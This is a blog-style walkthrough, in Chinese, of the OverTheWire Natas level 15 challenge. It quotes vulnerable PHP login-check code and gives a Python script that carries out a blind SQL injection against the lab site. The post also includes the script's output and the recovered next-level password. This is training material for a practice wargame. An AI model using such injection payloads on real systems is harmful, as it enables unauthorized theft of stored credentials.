Overthewire-natas15

Overthewire level 15 to level 16

这一关和14关不同的是,它只告诉了我们一个用户是否存在,并没有直接告诉我们密码是多少,网页源代码如下

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
}

我们先随便查一个看看。输入用户名natas16...存在...
那么我们该如何利用这个用户名呢,网站中还给了我们另外一个信息

CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);

那这题应该就是让我们去根据用户名获得密码了,但是由于网站回显中只有用户是否存在,因此需要写个脚本来暴力爆破密码。代码如下

import requests

target = 'http://natas15.natas.labs.overthewire.org/index.php'

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

filtered = ''
passwd = ''

for char in chars:
    payload = {'username': f'natas16" and password like binary "%{char}%"#'}
    resp = requests.post(target, auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=payload)
    if 'exists' in resp.text:
        filtered += char
        print(filtered)

for _ in range(32):
    for char in filtered:
        payload = {'username': f'natas16" and password like binary "{passwd + char}%"#'}
        resp = requests.post(target, auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=payload)
        if 'exists' in resp.text:
            passwd += char
            print(passwd)
            break

代码输出结果如下

a
ac
ace
aceh
acehi
acehij
acehijm
acehijmn
acehijmnp
acehijmnpq
acehijmnpqt
acehijmnpqtw
acehijmnpqtwB
acehijmnpqtwBE
acehijmnpqtwBEH
acehijmnpqtwBEHI
acehijmnpqtwBEHIN
acehijmnpqtwBEHINO
acehijmnpqtwBEHINOR
acehijmnpqtwBEHINORW
acehijmnpqtwBEHINORW3
acehijmnpqtwBEHINORW35
acehijmnpqtwBEHINORW356
acehijmnpqtwBEHINORW3569
acehijmnpqtwBEHINORW35690
W
Wa
WaI
WaIH
WaIHE
WaIHEa
WaIHEac
WaIHEacj
WaIHEacj6
WaIHEacj63
WaIHEacj63w
WaIHEacj63wn
WaIHEacj63wnN
WaIHEacj63wnNI
WaIHEacj63wnNIB
WaIHEacj63wnNIBR
WaIHEacj63wnNIBRO
WaIHEacj63wnNIBROH
WaIHEacj63wnNIBROHe
WaIHEacj63wnNIBROHeq
WaIHEacj63wnNIBROHeqi
WaIHEacj63wnNIBROHeqi3
WaIHEacj63wnNIBROHeqi3p
WaIHEacj63wnNIBROHeqi3p9
WaIHEacj63wnNIBROHeqi3p9t
WaIHEacj63wnNIBROHeqi3p9t0
WaIHEacj63wnNIBROHeqi3p9t0m
WaIHEacj63wnNIBROHeqi3p9t0m5
WaIHEacj63wnNIBROHeqi3p9t0m5n
WaIHEacj63wnNIBROHeqi3p9t0m5nh
WaIHEacj63wnNIBROHeqi3p9t0m5nhm
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Process finished with exit code 0

密码就是WaIHEacj63wnNIBROHeqi3p9t0m5nhmh了....

posted @ 2021-05-26 09:18  wudiiv11  阅读(143)  评论(0编辑  收藏  举报